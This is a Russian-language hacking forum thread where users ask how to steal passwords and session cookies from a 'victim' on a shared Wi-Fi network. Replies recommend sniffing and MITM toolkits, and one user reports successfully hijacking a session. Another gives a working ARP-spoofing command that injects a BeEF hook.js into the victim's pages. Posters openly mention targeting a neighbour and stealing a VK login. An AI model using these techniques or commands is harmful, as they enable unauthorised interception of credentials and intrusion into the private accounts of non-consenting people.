![]() |
Всем привет. Нужно слить пароль/куки с компа жертвы. Весь траффик проходит через роутер, к которому у меня есть доступ по воздуху (и скорее всего к его интерфейсу, роутер TP-Link). Я имею ноут с вин 8 и кали линукс, а так же желание.
|
Юзай http://comax.fr/yamas.php в Kali Linux
|
Цитата:
должны же быть более существенные методы, при имении полного доступа хотя бы к тому же роутеру, может можно подменить траффик или че то типа того. |
|
Насколько я знаю, android мобила в связке с http://4pda.ru/forum/index.php?showtopic=243228 или http://4pda.ru/forum/index.php?showtopic=262107 должна справиться
|
Цитата:
Цитата:
|
Отпишись о результате, тоже интересно.
|
Воу спасибо за программку, щас пойду ломать соседнюю тяночку
|
Отлично работает под виндоус связка Cain+Wireshark+EditThisCookie. Сейчас быстренько поставлю кали и буду под ней тетировать более эффективный способ. Если что, обращайтесь за подробностями.
|
Цитата:
|
|
dsploit + intercepter
|
Напишу репорт о работе в поле.
Короче как и предполагалось куки я захавал, обработал на страничку попал, все это заняло примерно минуты 3. Теперь о минусах: куки завязаны с ip, то бишь работать с ними можно только на месте, домой вы их не унесете. Насколько я понял, так можно сделать только с теми куками, которые мы получили сразу после авторизации "жертвы". Это реально в тех же макдаках и т.п., а т.к. я ловил свою "жертву" на ПМЖ, то такое вряд-ли прокатит, ну либо надо поседеть пару суток. Плюс ко всему жизнь этих "кук" истекает после нажатия жертвой кнопки "выход". Вывод: способ довольно малоэффективен. При наличии моих ресурсов можно придумать что-нибудь более эффективное, но т.к. я в этом вопросе относительно дилетант, то хз. |
Цитата:
Не забывай, что человек может авторизоваться куда нибудь еще. Пароли могут совпадать и т.п. Включи ты фантазию наконец. |
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
MITMF+cobalt+beef
смысл такой. делаешь митм атаку с инжектом в страницу. получаешь некий доступ к жертве, дальше подсовываешь её что-то , или же рыскаешь на наличие сплоитов, в любом случае это лучшее решение. Но есть некторые нюансы |
Цитата:
|
Всё в кали
запускаешь BEEF ДАЛЕЕ В КОНСОЛЕ КОПИРУЕШЬ сылку твой it:3000/hook.js apt-get install mitmf mitmf --arp --spoof -gateway 192.168.1.1 -target трой ip --inject js-url твой it:3000/hook.js про установку кобольта долго объяснять, но этого хватит. если что ЛС. но я бываю редко. Точнее не часто |
А если Kali поставить на виртуалку, нужны ли какие нибудь надстройки над windows для полной работы kali?
|
спасибо всем за советы в теме, тоже актуальной оказалась проблема
|
Цитата:
|
Цитата:
|
Intercepter-ng хватит с головой для такой задачи. Там есть функционал для "убийства" куков и перехвата логина с паролем при последующей авторизации.
Видосов по использованию на ютубе масса) |
Цитата:
|
Цитата:
|
Цитата:
|
Всем привет, нужно узнать логин пароль от вк, жертва сидит только на iOS с оф.приложения. Есть доступ к wifi и устройства на iOS и андроид.
|
Всё в кали
запускаешь BEEF ДАЛЕЕ В КОНСОЛЕ КОПИРУЕШЬ сылку твой it:3000/hook.js apt-get install mitmf mitmf --arp --spoof -gateway 192.168.1.1 -target трой ip --inject js-url твой it:3000/hook.js обьясни по подробней как и что? |
Если в локалке ,то лучше чем интерцептор не найдешь снифера.
|
| Время: 09:49 |